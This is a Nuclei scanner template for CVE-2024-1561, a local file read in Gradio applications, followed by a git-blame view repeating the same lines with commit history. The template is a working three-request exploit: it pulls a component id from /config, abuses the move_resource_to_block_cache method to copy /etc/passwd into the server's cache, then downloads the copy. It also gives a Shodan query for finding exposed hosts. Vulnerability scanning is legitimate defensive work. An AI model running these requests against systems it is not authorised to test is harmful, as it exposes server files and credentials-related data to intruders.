nuclei-templates/http/cves/2024/CVE-2024-1561.yaml

id: CVE-2024-1561

info:
  name: Gradio Applications - Local File Read
  author: Diablo
  severity: high
  description: |
    Local file read by calling arbitrary methods of Components class
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read files on the server
  remediation: |
    Update to Gradio 4.13.0
  reference:
    - https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
    - https://github.com/DiabloHTB/CVE-2024-1561
    - https://nvd.nist.gov/vuln/detail/CVE-2024-1561
    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
    - https://www.gradio.app/changelog#4-13-0
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-1561
    cwe-id: CWE-29
    epss-score: 0.00087
    epss-percentile: 0.36659
  metadata:
    verified: true
    max-request: 3
    shodan-query: html:"__gradio_mode__"
  tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr
flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET /config HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: first-component
        part: body
        group: 1
        json:
          - '.components[0].id'
        internal: true

  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "{{first-component}}","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

    extractors:
      - type: regex
        name: tmpath
        regex:
          - \/[a-zA-Z0-9\/]+
        internal: true

  - raw:
      - |
        GET /file={{tmpath}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
          - 'contains(header, "text/plain")'
        condition: and
# digest: 490a004630440220321f22e77b20acc61afa7b5cbf1f465becdb09178d7c23342a1d1be0a11c843502205a9d96fc3f2429ce7f2566dce2a289b2ff6529266cee50a0d24bd60336562f19:922c64590222798bb761d5b6d8e72950
Create CVE-2024-1561.yaml 2024-05-14 17:01:40 +00:00			`id: CVE-2024-1561`

			`info:`
updated matcher type 2024-05-15 06:16:08 +00:00			`name: Gradio Applications - Local File Read`
Create CVE-2024-1561.yaml 2024-05-14 17:01:40 +00:00			`author: Diablo`
			`severity: high`
			`description: \|`
			`Local file read by calling arbitrary methods of Components class`
			`impact: \|`
			`Successful exploitation of this vulnerability could allow an attacker to read files on the server`
			`remediation: \|`
			`Update to Gradio 4.13.0`
			`reference:`
			`- https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338`
			`- https://github.com/DiabloHTB/CVE-2024-1561`
			`- https://nvd.nist.gov/vuln/detail/CVE-2024-1561`
			`- https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2`
product/queries updated 2024-05-31 19:23:20 +00:00			`- https://www.gradio.app/changelog#4-13-0`
Create CVE-2024-1561.yaml 2024-05-14 17:01:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 7.5`
			`cve-id: CVE-2024-1561`
			`cwe-id: CWE-29`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-score: 0.00087`
			`epss-percentile: 0.36659`
Create CVE-2024-1561.yaml 2024-05-14 17:01:40 +00:00			`metadata:`
			`verified: true`
			`max-request: 3`
			`shodan-query: html:"__gradio_mode__"`
updated matcher type 2024-05-15 06:16:08 +00:00			`tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr`
Create CVE-2024-1561.yaml 2024-05-14 17:01:40 +00:00			`flow: http(1) && http(2) && http(3)`

			`http:`
			`- raw:`
			`- \|`
			`GET /config HTTP/1.1`
			`Host: {{Hostname}}`

			`extractors:`
			`- type: json`
			`name: first-component`
			`part: body`
			`group: 1`
			`json:`
			`- '.components[0].id'`
			`internal: true`

			`- raw:`
fix trail space 2024-05-14 17:05:12 +00:00			`- \|`
Create CVE-2024-1561.yaml 2024-05-14 17:01:40 +00:00			`POST /component_server HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/json`

updated matcher type 2024-05-15 06:16:08 +00:00			`{"component_id": "{{first-component}}","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}`
Create CVE-2024-1561.yaml 2024-05-14 17:01:40 +00:00
			`extractors:`
			`- type: regex`
			`name: tmpath`
fix trail space 2024-05-14 19:46:04 +00:00			`regex:`
minor update 2024-05-14 19:42:14 +00:00			`- \/[a-zA-Z0-9\/]+`
Create CVE-2024-1561.yaml 2024-05-14 17:01:40 +00:00			`internal: true`

			`- raw:`
			`- \|`
minor update 2024-05-14 19:42:14 +00:00			`GET /file={{tmpath}} HTTP/1.1`
Create CVE-2024-1561.yaml 2024-05-14 17:01:40 +00:00			`Host: {{Hostname}}`

			`matchers:`
updated matcher type 2024-05-15 06:16:08 +00:00			`- type: dsl`
			`dsl:`
			`- regex('root:.*:0:0:', body)`
			`- 'contains(header, "text/plain")'`
			`condition: and`
Auto Template Signing [Wed May 15 06:21:50 UTC 2024] :robot: 2024-05-15 06:21:50 +00:00			`# digest: 490a004630440220321f22e77b20acc61afa7b5cbf1f465becdb09178d7c23342a1d1be0a11c843502205a9d96fc3f2429ce7f2566dce2a289b2ff6529266cee50a0d24bd60336562f19:922c64590222798bb761d5b6d8e72950`